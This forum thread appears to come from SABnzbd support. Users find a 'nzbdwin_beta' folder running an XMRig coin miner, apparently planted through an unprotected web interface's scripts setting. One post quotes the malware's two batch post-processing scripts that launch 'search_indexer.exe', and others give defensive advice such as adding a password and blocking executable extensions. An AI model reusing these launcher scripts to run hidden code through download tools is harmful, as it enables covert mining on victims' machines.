Hi,
Yesterday I got a warning from Bitdefender referencing a program in the nzbdwin_beta folder which appeared in the SABnzbd complete folder.
Is this legit? Or a virus/trojan etc?
The folder gets recreated after I delete it.
I've googled it with no result, and Malwarebytes scan didn't detect any malware/spyware.
Sincerely,
Lowell
nzbdwin_beta folder: Malware ... coin miner
Forum rules
Help us help you:
Help us help you:
- Are you using the latest stable version of SABnzbd? Downloads page.
- Tell us what system you run SABnzbd on.
- Adhere to the forum rules.
- Do you experience problems during downloading?
Check your connection in Status and Interface settings window.
Use Test Server in Config > Servers.
We will probably ask you to do a test using only basic settings. - Do you experience problems during repair or unpacking?
Enable +Debug logging in the Status and Interface settings window and share the relevant parts of the log here using [ code ] sections.
Re: nzbdwin_beta folder
nzbdwin_beta is not something SABnzbd creates.
Or is this maybe the name of one of your folders in Config > Folders?
Or is this maybe the name of one of your folders in Config > Folders?
If you like our support, check our special newsserver deal or donate at: https://sabnzbd.org/donate
Re: nzbdwin_beta folder
Was listed in the Config > Folders > Scripts field .
What is the default for this field?
I didn't change this.
What is the default for this field?
I didn't change this.
Re: nzbdwin_beta folder
No, it's not default. You can remove it.
Are you really really sure you didn't set that yourself?
Are you really really sure you didn't set that yourself?
If you like our support, check our special newsserver deal or donate at: https://sabnzbd.org/donate
Re: nzbdwin_beta folder
I noticed this folder the other day after my CPU usage hit 100%. It was running XMRIG miner. I'm not sure where it came from and I did not run any exe files I think it must have exploited a post processing script.
Re: nzbdwin_beta folder
From Reddit
So its a Crypto miner, it uses two cron.bat files to have SABNzbd open itself.
@echo off
cd /d %1
start "" "search_indexer.exe" & exit
@echo off
goto start:
########################################
### NZBGET POST-PROCESSING SCRIPT ###
:start
cd /d %NZBPP_DIRECTORY%
start search_indexer.exe
exit /b 93
So its a Crypto miner, it uses two cron.bat files to have SABNzbd open itself.
@echo off
cd /d %1
start "" "search_indexer.exe" & exit
@echo off
goto start:
########################################
### NZBGET POST-PROCESSING SCRIPT ###
:start
cd /d %NZBPP_DIRECTORY%
start search_indexer.exe
exit /b 93
Re: nzbdwin_beta folder
Is your Sabnzbd exposed to the internet without username and password?
If you like our support, check our special newsserver deal or donate at: https://sabnzbd.org/donate
Re: nzbdwin_beta folder: Malware ... coin miner
Not any longer
Re: nzbdwin_beta folder: Malware ... coin miner
Oh, everybody: to avoid this in the future:
1) don't have your SAB-webgui unprotected open to Internet: at least put a password on it. Plus: put it on a less well known port, like 49231
2) in SABnzbd, at Unwanted Extensions, fill out EXE, COM, BAT
1) don't have your SAB-webgui unprotected open to Internet: at least put a password on it. Plus: put it on a less well known port, like 49231
2) in SABnzbd, at Unwanted Extensions, fill out EXE, COM, BAT
Re: nzbdwin_beta folder: Malware ... coin miner
I'm getting this malware now.
Now that I'm infected, how do I stop the cron process that is repeatedly running? I added username and password so it stopped downloading the stuff...
Now that I'm infected, how do I stop the cron process that is repeatedly running? I added username and password so it stopped downloading the stuff...
Re: nzbdwin_beta folder: Malware ... coin miner
cron process? That sounds Linux, but the malware is Windows (AFAIK) ... so can you explain?